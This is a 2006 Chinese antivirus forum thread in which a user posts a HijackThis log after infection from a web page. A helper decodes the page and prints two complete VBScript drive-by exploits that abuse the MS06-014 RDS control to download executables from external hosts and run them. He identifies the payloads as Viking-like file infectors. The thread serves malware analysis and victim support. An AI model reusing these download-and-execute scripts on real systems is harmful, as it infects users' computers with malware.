我的电脑是进入此网址后中的毒，正版瑞星也杀不了，希望版主帮我一下 bbs.ikaka.com

红迷 - 2006-11-22 21:03:00

http://www.32666.com/ad/cfad/qqcf.asp?11&linli1109 大家一定要帮我

6981313 - 2006-11-22 21:07:00

扫个日志吧,没日志,大家帮不上!
到http://free5.ys168.com/?jxsbb
下载HijackThis1[1].99.1.rar 0.2MB 系统扫描工具或sreng2.zip 0.4MB 系统扫描工具，解压，打开，运行，执行扫描，保存日志，将日志内容贴上来，注意不要改动，一次贴不完，分多次贴！

水树雨下 - 2006-11-22 21:09:00

杀软能报，应该不是什么厉害角色，看看去……

红迷 - 2006-11-22 21:13:00

Logfile of HijackThis v1.99.1
Scan saved at 21:04:36, on 2005-11-22
Platform: Windows 2003 SP1 (WinNT 5.02.3790)
MSIE: Internet Explorer v6.00 SP1 (6.00.3790.1830)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Rising\Rav\CCenter.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\msdtc.exe
C:\WINDOWS\system32\inetsrv\inetinfo.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\WINDOWS\system32\nvsvc32.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\alg.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Rising\Rav\RavTask.exe
C:\WINDOWS\system32\ctfmon.exe
C:\WINDOWS\system32\conime.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\Program Files\Rising\Rfw\rfwmain.exe
c:\program files\rising\rfw\rfwsrv.exe
C:\Program Files\Rising\Rav\Ravmond.exe
C:\Program Files\Rising\Rav\RAVMON.EXE
C:\Program Files\Rising\Rav\RavStub.exe
C:\Program Files\Rising\Rav\RsAgent.exe
C:\WINDOWS\msagent\AgentSvr.exe
D:\Tencent\QQ\QQ.exe
D:\Tencent\QQ\TIMPlatform.exe
C:\Program Files\wnwb2005\wnwb.exe
C:\Program Files\Macromedia\Fireworks 8\Fireworks.exe
C:\Program Files\Rising\Rav\RsLogVw.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\ACD Systems\ACDSee\8.0\ACDSee8.exe
C:\Program Files\Internet Explorer\iexplore.exe
E:\安全相关\灰鸽子检查器\155847200541134207\HijackThis.exe
C:\Program Files\Rising\KakaToolBar\Ras.exe

R3 - URLSearchHook: bho Class - {ED8DFC5C-10EF-45AB-9DC2-0639AFF5A270} - C:\PROGRA~1\COMMON~1\Wnwb\wnwbio.dll
F2 - REG:system.ini: Shell=
F2 - REG:system.ini: UserInit=C:\WINDOWS\system32\userinit.exe,rundll32.exe C:\WINDOWS\system32\winsys16_061114.dll start,
O2 - BHO: update wnwb - {ED8DFC5C-10EF-45AB-9DC2-0639AFF5A270} - C:\PROGRA~1\COMMON~1\Wnwb\wnwbio.dll
O3 - Toolbar: 卡卡上网安全助手 - {DB9ECD4F-FB8F-4311-B3CE-90B976C2707C} - C:\WINDOWS\system32\kakatool.dll
O4 - HKLM\..\Run: [RavTask] "C:\Program Files\Rising\Rav\RavTask.exe" -system
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - Startup: EyeLoveU.lnk = C:\Program Files\EyeLoveU 3.5\ELU.exe
O4 - Startup: share_del.lnk = C:\share.bat
O8 - Extra context menu item: 上传到QQ网络硬盘 - D:\Tencent\QQ\AddToNetDisk.htm
O8 - Extra context menu item: 添加到QQ自定义面板 - D:\Tencent\QQ\AddPanel.htm
O8 - Extra context menu item: 添加到QQ表情 - D:\Tencent\QQ\AddEmotion.htm
O8 - Extra context menu item: 用QQ彩信发送该图片 - D:\Tencent\QQ\SendMMS.htm
O16 - DPF: {5EC7C511-CD0F-42E6-830C-1BD9882F3458} (PowerPlayer Control) - http://download.ppstream.com/bin/powerplayer.cab
O16 - DPF: {8D9E0B29-563C-4226-86C1-5FF2AE77E1D2} (AxSubmitControl Class) - https://mybank.icbc.com.cn/icbc/perbank/AxSafeControls.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{9314895C-E762-4BB7-AA6D-A104C23A9E2B}: NameServer = 61.234.254.5
O17 - HKLM\System\CCS\Services\Tcpip\..\{D928145B-EDF7-47D9-99F7-E5225500B4B8}: NameServer = 61.234.254.5,192.168.1.1
O18 - Protocol: about - {3050F406-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\system32\mshtml.dll
O18 - Protocol: cdl - {3DD53D40-7B8B-11D0-B013-00AA0059CE02} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: dvd - {12D51199-0DB5-46FE-A120-47A3D7D937CC} - C:\WINDOWS\system32\msvidctl.dll
O18 - Protocol: file - {79EAC9E7-BAF9-11CE-8C82-00AA004BA90B} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: ftp - {79EAC9E3-BAF9-11CE-8C82-00AA004BA90B} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: gopher - {79EAC9E4-BAF9-11CE-8C82-00AA004BA90B} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: http - {79EAC9E2-BAF9-11CE-8C82-00AA004BA90B} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: https - {79EAC9E5-BAF9-11CE-8C82-00AA004BA90B} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: ipp - (no CLSID) - (no file)
O18 - Protocol: its - {9D148291-B9C8-11D0-A4CC-0000F80149F6} - C:\WINDOWS\system32\itss.dll
O18 - Protocol: javascript - {3050F3B2-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\system32\mshtml.dll
O18 - Protocol: local - {79EAC9E7-BAF9-11CE-8C82-00AA004BA90B} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: mailto - {3050F3DA-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\system32\mshtml.dll
O18 - Protocol: mhtml - {05300401-BCBC-11D0-85E3-00C04FD85AB4} - C:\WINDOWS\system32\inetcomm.dll
O18 - Protocol: mk - {79EAC9E6-BAF9-11CE-8C82-00AA004BA90B} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: ms-its - {9D148291-B9C8-11D0-A4CC-0000F80149F6} - C:\WINDOWS\system32\itss.dll
O18 - Protocol: msdaipp - (no CLSID) - (no file)
O18 - Protocol: res - {3050F3BC-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\system32\mshtml.dll
O18 - Protocol: sysimage - {76E67A63-06E9-11D2-A840-006008059382} - C:\WINDOWS\system32\mshtml.dll
O18 - Protocol: tv - {CBD30858-AF45-11D2-B6D6-00C04FBBDE6E} - C:\WINDOWS\system32\msvidctl.dll
O18 - Protocol: vbscript - {3050F3B2-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\system32\mshtml.dll
O18 - Protocol: vnd.ms.radio - {3DA2AA3B-3D96-11D2-9BD2-204C4F4F5020} - C:\WINDOWS\system32\msdxm.ocx
O18 - Protocol: wia - {13F3EA8B-91D7-4F0A-AD76-D2853AC8BECE} - C:\WINDOWS\system32\wiascr.dll
O20 - AppInit_DLLs: 608769M.BMP
O20 - Winlogon Notify: dimsntfy - C:\WINDOWS\SYSTEM32\dimsntfy.dll
O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: iPodService - Apple Computer, Inc. - D:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Network Logon (NetWorkLogon) - Unknown owner - rundll32.exe (file missing)
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
O23 - Service: Rising Proxy Service (RfwProxySrv) - Beijing Rising Technology Co., Ltd. - c:\program files\rising\rfw\rfwproxy.exe
O23 - Service: Rising Personal Firewall Service (RfwService) - Beijing Rising Technology Co., Ltd. - c:\program files\rising\rfw\rfwsrv.exe
O23 - Service: Rising Process Communication Center (RsCCenter) - Beijing Rising Technology Co., Ltd. - C:\Program Files\Rising\Rav\CCenter.exe
O23 - Service: Rising RealTime Monitor (RsRavMon) - Beijing Rising Technology Co., Ltd. - C:\Program Files\Rising\Rav\Ravmond.exe
O23 - Service: Ulead Burning Helper (UleadBurningHelper) - Ulead Systems, Inc. - C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe

网络一兵 - 2006-11-22 21:14:00

引用:

【水树雨下的贴子】杀软能报，应该不是什么厉害角色，看看去……
………………

进去看了吗？好看吗？？？？

红迷 - 2006-11-22 21:16:00

这是我电脑进程
瑞星也查不到毒，手动清了后，但一小时后又发作了

水树雨下 - 2006-11-22 21:17:00

修复
O4 - Startup: share_del.lnk = C:\share.bat
安全模式下删除C:\share.bat

红迷 - 2006-11-22 21:20:00

引用:

【水树雨下的贴子】修复
O4 - Startup: share_del.lnk = C:\share.bat
安全模式下删除C:\share.bat
………………

这是我的程序，手动我可以清掉毒，看标题

mopery - 2006-11-22 21:27:00

我进去没撒反映..

水树雨下 - 2006-11-22 21:30:00

又误杀一个

【回复“网络一兵”的帖子】
没意思，无聊……

mopery - 2006-11-22 21:32:00

应该不是误杀..

偶兄弟们在还原代码稍等..

westbeck - 2006-11-22 21:44:00

我也去看了,源码绝对有问题,不是误杀.等M版来还原吧: )

deadmanzj - 2006-11-22 21:54:00

真实的网站是hXXp://3w.ycdy.com/cfad/0002.htm，但这个本身没问题，跳到hXXp://3w.ycdy.com/cfad/0001.htm

再由hXXp://3w.ycdy.com/cfad/0001.htm继续跳

偶是被气死了。。。一个无聊的 JS浪费偶N多时间

饶了大圈回到原来的网页，http://www1.ycdy.com/demo/mm.htm这个
<script language="VBScript">

on error resume next

MircoLong = "http://www1.ycdy.com/demo/cha0.exe"

m4="down"
m5="file"
m6="copy"
m7="exit"
Set MircoLongc = document.createElement("object")
MircoLongc.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
seturla=m4
seturlb=m5
seturlc=m6
seturld=m7
MircoLongi="Microsoft.XMLHTTP"
Set MircoLongd = MircoLongc.CreateObject(MircoLongi,"")
seturlf="Ado"
seturlg="db."
seturlh="Str"
seturli="eam"
MircoLongf=seturlf&seturlg&seturlh&seturli
MircoLongg=MircoLongf
set MircoLonga = MircoLongc.createobject(MircoLongg,"")
MircoLonga.type = 1
MircoLongh="GET"
MircoLongd.Open MircoLongh, MircoLong, False
MircoLongd.Send
MircoLong9="svchost.exe"
set MircoLongb = MircoLongc.createobject("Scripting.FileSystemObject","")
set MircoLonge = MircoLongb.GetSpecialFolder(2)
MircoLonga.open
MircoLong8="MircoLonga.BuildPath(MircoLonga,MircoLong8)"
MircoLong7="MircoLongb.BuildPath(MircoLongb,MircoLong7)"
MircoLong6="MircoLongc.BuildPath(MircoLongd,MircoLong6)"
MircoLong5="MircoLongd.BuildPath(MircoLongf,MircoLong5)"
MircoLong4="MircoLonge.BuildPath(MircoLongg,MircoLong4)"
MircoLong3="MircoLongf.BuildPath(MircoLongh,MircoLong4)"
MircoLong2="MircoLongg.BuildPath(MircoLongi,MircoLong3)"
MircoLong1="MircoLongh.BuildPath(MircoLongg,MircoLong1)"
MircoLong0="MircoLongi.BuildPath(MircoLongk,MircoLong0)"
MircoLong9= MircoLongb.BuildPath(MircoLonge,MircoLong9)
MircoLonga.write MircoLongd.responseBody
MircoLonga.savetofile MircoLong9,2
MircoLonga.close
set MircoLonge = MircoLongc.createobject("Shell.Application","")
MircoLonge.ShellExecute MircoLong9,BBS,BBS,"open",0

</script>

第二个，http://60.190.222.233/wm/ip2.htm解密后

<html>
<script language="VBScript">
on error resume next
MyQQ5372453="http://60.190.222.233/wm/xia.exe"
Set CAOc = document.createElement("object")
c1 ="clsid:BD"
c2="96C556-65A3-11"
c3="D0-983A-00C04F"
c4="C29E36"
CAOc.setAttribute "classid",c1+c2+c3+c4
seturla="down"
seturlb="file"
seturlc="copy"
seturld="exit"
seturle="base"
CAOi="Microsoft.XMLHTTP"
Set CAOd = CAOc.CreateObject(CAOi,"")
seturlf="Ado"
seturlg="db."
seturlh="Str"
seturli="eam"
CAOf=seturlf&seturlg&seturlh&seturli
CAOg=CAOf
set CAOa = CAOc.createobject(CAOg,"")
CAOa.type = 1
CAOh="GET"
CAOd.Open CAOh, MyQQ5372453, False
CAOd.Send
CAO9="xia.exe"
set CAOb = CAOc.createobject("Scripting.FileSystemObject","")
set CAOe = CAOb.GetSpecialFolder(2)
CAOa.open
CAO8="CAOa.BuildPath(CAOa,CAO8)"
CAO7="CAOb.BuildPath(CAOb,CAO7)"
CAO6="CAOc.BuildPath(CAOd,CAO6)"
CAO5="CAOd.BuildPath(CAOf,CAO5)"
CAO4="CAOe.BuildPath(CAOg,CAO4)"
CAO3="CAOf.BuildPath(CAOh,CAO4)"
CAO2="CAOg.BuildPath(CAOi,CAO3)"
CAO1="CAOh.BuildPath(CAOg,CAO1)"
CAO0="CAOi.BuildPath(CAOk,CAO0)"
CAO9= CAOb.BuildPath(CAOe,CAO9)
CAOa.write CAOd.responseBody
CAOa.savetofile CAO9,2
CAOa.close
set CAOe = CAOc.createobject("Shell.Application","")
CAOe.ShellExecute CAO9,BBS,BBS,"open", 0
</script>
</html>

M，哪会干这么辛苦的活呢，这种苦事嘛，就交偶来了，希望他多多测试病毒，哈哈

偶的表达能力不行，写不了分析

deadmanzj - 2006-11-22 22:02:00

绝对不是误杀，看看这2个代码就知道了，第一个下载http://www1.ycdy.com/demo/cha0.exe，第二个下载http://60.190.222.233/wm/xia.exe，以上2个都是利用MS06-14漏洞。。。。只要打了补丁就不会中。。具体的偶下载来看看

deadmanzj - 2006-11-22 22:11:00

下来运行了下，第一个http://www1.ycdy.com/demo/cha0.exe
生成威金LOGO1_.EXE等一大堆东西，感染所有exe文件，变成***.exe.Exe

第二个http://60.190.222.233/wm/xia.exe产生C:\WINDOWS\uninstall\rundl132.exe,C:\WINDOWS\RichDll.dll,也像是威金

有连网，怀疑是DL。。。好多一堆东西

deadmanzj - 2006-11-22 22:37:00

楼主不在的说。。。晕死。。就算复习了

瑞星卡卡安全论坛